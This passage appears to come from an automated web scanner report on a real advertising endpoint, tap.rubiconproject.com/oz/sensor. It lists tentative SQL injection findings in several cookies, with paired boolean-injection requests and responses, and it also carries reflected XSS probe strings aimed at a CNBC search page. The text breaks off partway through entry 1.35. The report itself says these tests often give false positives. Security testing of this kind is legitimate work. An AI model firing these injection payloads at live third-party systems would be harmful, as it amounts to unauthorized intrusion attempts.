User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d1--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: dq=49|4|45|0; Expires=Fri, 15-Jun-2012 15:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=93&k=southern+union:328,energy+transfer:312,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:122,energy:112,billion+cnbc:80,union:72,transfer:72,southern:72,please+respect:64,must+click:64,cnbc+reserves:64,cnbc+highlights:64,related+links:64,cnbc+welcomes:64,posted+yet:64,2011:56,asia+pacific:56,datetime+08:56,expiration+datetime:48,datetime+6:48,16+2011:48,2011+8:48,8+27:48,6+16:48,special+reports:48,billion:46,datetime:46,union+company:40,will+buy:40,burgeoning+u:40,11+billion:40,transfer+partners:40,midstream+company:40,large+midstream:40,will+benefit:40,energy+news:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; dq=47|4|43|0; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128; rdk=6451/1195319874108'%20or%201%3d2--%20; rdk2=1; ses2=11953^37; csi2=1300433.js^1^1308237983^1308237983&2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 15:27:27 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.32. http://tap.rubiconproject.com/oz/sensor [rdk15 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rdk15 cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the rdk15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d1--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: dq=92|4|88|0; Expires=Sat, 16-Jun-2012 10:11:40 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=64&k=xss3a34b+script:168,script+7c5fa54ba36cca68:168,script+alert:160,script+script:160,script:126,7c5fa54ba36cca68+cnbc:88,cnbc+search:80,search+results:72,cnbc:66,sponsored+results:64,matching+symbols:64,refine+results:64,7c5fa54ba36cca68:44,xss3a34b:40,alert:40,matching+symbol:32,sponsored+result:32,search+result:32,refine+result:32,cnbc+pro:24,asia+pacific:16,refine:16,cnbc+tv:16,date:16,format:16,last:16,special+reports:16,sponsored:16,matching:16,symbols:16,video:14,days:12,stock+screener:8,ceo+interviews:8,symbol:8,earnings+front:8,special+report:8,markets:8,world+markets:8,member+center:8,&rd=burp&t=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; csi2=1300433.js^40^1308237983^1308251958&3173951.js^1^1308241389^1308241389&2553662.js^15^1308233336^1308240157&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; cd=false; dq=90|4|86|0; ruid=154dd07bb6adc1d6f31bfa10^8^1308305453^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=6451/11953; rdk15=0%20and%201%3d2--%20; ses15=11953^1; csi15=1295121.js^2^1308235497^1308305453&1300434.js^43^1308237982^1308251958&3173952.js^1^1308241079^1308241079&2553663.js^20^1308234261^1308240767&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Fri, 17 Jun 2011 10:11:40 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.33. http://tap.rubiconproject.com/oz/sensor [rpb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The rpb cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the rpb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d1--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:11:48 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=15&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,transfer:72,southern:72,related+links:64,posted+yet:64,cnbc+welcomes:64,cnbc+highlights:64,please+respect:64,cnbc+reserves:64,must+click:64,2011:56,asia+pacific:56,datetime+05:56,6+16:48,2011+5:48,16+2011:48,datetime+6:48,special+reports:48,expiration+datetime:48,billion:46,datetime:46,will+benefit:40,will+buy:40,11+billion:40,equity+will:40,5+30:40,energy+news:40,datetime+11:40,55+16:40,burgeoning+u:40,union+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1'%20and%201%3d2--%20; cd=false; dq=20|4|16|0; ses2=11953^4; csi2=3187870.js^3^1308226504^1308227440&3183300.js^1^1308227126^1308227126; rdk=6451/11953; ses15=11953^9; csi15=3187871.js^6^1308225219^1308227440&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:11:48 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.34. http://tap.rubiconproject.com/oz/sensor [ses15 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The ses15 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ses15 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d1--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:18 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: dq=17|4|13|0; Expires=Fri, 15-Jun-2012 12:09:19 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=6&k=cnbc+search:80,script+alert:80,title+script:80,xss36c5e+title:80,script+2789f6ff334a89918:80,search+results:72,matching+symbols:64,sponsored+results:64,refine+results:64,cnbc:46,xss36c5e:40,script:40,search+result:32,refine+result:32,matching+symbol:32,sponsored+result:32,2789f6ff334a89918:24,cnbc+pro:24,title:20,alert:20,asia+pacific:16,special+reports:16,last:16,date:16,sponsored:16,matching:16,symbols:16,refine:16,format:16,cnbc+tv:16,video:14,days:12,stock+screener:8,ceo+interviews:8,earnings+front:8,special+report:8,member+center:8,fund+screener:8,symbol+lookup:8,markets+front:8,&rd=burp&t=xss36c5e HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=12|4|8|0; rdk=6451/11953; rdk15=0; ses15=11953^2'%20and%201%3d2--%20; csi15=3187871.js^1^1308225219^1308225219&3206204.js^1^1308225202^1308225202

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 12:09:19 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.35. http://tap.rubiconproject.com/oz/sensor [ses2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The ses2 cookie appears to be vulnerable to SQL injection attacks. The payloads 20978879'%20or%201%3d1--%20 and 20978879'%20or%201%3d2--%20 were each submitted in the ses2 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

